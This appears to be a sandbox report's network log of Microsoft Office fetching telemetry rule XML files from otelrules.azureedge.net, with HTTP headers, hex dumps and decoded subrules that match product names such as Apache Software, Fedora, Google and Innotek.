                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:53 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  89192.168.2.44985513.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:53 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:53 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:53 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 448
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                  ETag: "0x8DC582BB389F49B"
                                                                                                                  x-ms-request-id: 09d319c7-501e-008c-1e01-36cd39000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140053Z-r178fb8d765n474shC1DFWge7g00000002k000000000cthp
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:53 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  90192.168.2.44985613.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:53 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:53 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:53 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 491
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                  ETag: "0x8DC582B98B88612"
                                                                                                                  x-ms-request-id: d6de3b9d-801e-00a0-7812-362196000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140053Z-1749fc9bdbdmg6wshC1DFWu2bc00000002s00000000060e7
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:53 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  91192.168.2.44985913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:54 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:54 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 416
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                  ETag: "0x8DC582BAEA4B445"
                                                                                                                  x-ms-request-id: 46e97820-b01e-0097-069a-364f33000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140054Z-r178fb8d765kzgrxhC1DFWrsuc00000002cg00000000f1pb
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:54 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  92192.168.2.44986013.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:54 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:54 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 479
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                  ETag: "0x8DC582B989EE75B"
                                                                                                                  x-ms-request-id: a8f543db-f01e-003f-08a0-34d19d000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140054Z-r178fb8d765dbczshC1DFW33an00000002k00000000043ct
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:54 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  93192.168.2.44986113.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:54 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:54 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 415
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                  ETag: "0x8DC582BA80D96A1"
                                                                                                                  x-ms-request-id: 81840efa-e01e-0085-3c5a-32c311000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140054Z-16547b76f7f7lhvnhC1DFWa2k00000000kng00000000axb0
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:54 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  94192.168.2.44986213.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:54 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:54 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 471
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                  ETag: "0x8DC582B97E6FCDD"
                                                                                                                  x-ms-request-id: a4ba0423-501e-0029-6446-2cd0b8000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140054Z-16547b76f7fj897nhC1DFWdwq40000000kp00000000043ps
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:54 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  95192.168.2.44986313.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:54 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:54 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 419
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                  ETag: "0x8DC582B9C710B28"
                                                                                                                  x-ms-request-id: f331b8e7-a01e-0070-470c-36573b000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140054Z-1749fc9bdbdmg6wshC1DFWu2bc00000002r00000000094s3
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:54 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  96192.168.2.44986713.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:55 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:55 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 477
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                  ETag: "0x8DC582BA54DCC28"
                                                                                                                  x-ms-request-id: 02e40e2a-001e-00a2-7a2b-36d4d5000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140055Z-16547b76f7f67wxlhC1DFWah9w0000000kn000000000gzpn
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:55 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  97192.168.2.44987113.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:55 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:55 UTC470INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 472
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                  ETag: "0x8DC582BB650C2EC"
                                                                                                                  x-ms-request-id: 57b0571f-501e-00a3-7dfb-2cc0f2000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140055Z-16547b76f7frbg6bhC1DFWr5400000000kq0000000007d0n
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:55 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  98192.168.2.44986913.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:55 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:55 UTC491INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 477
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                  ETag: "0x8DC582BA48B5BDD"
                                                                                                                  x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140055Z-16547b76f7f4k79zhC1DFWu9y00000000krg00000000equy
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
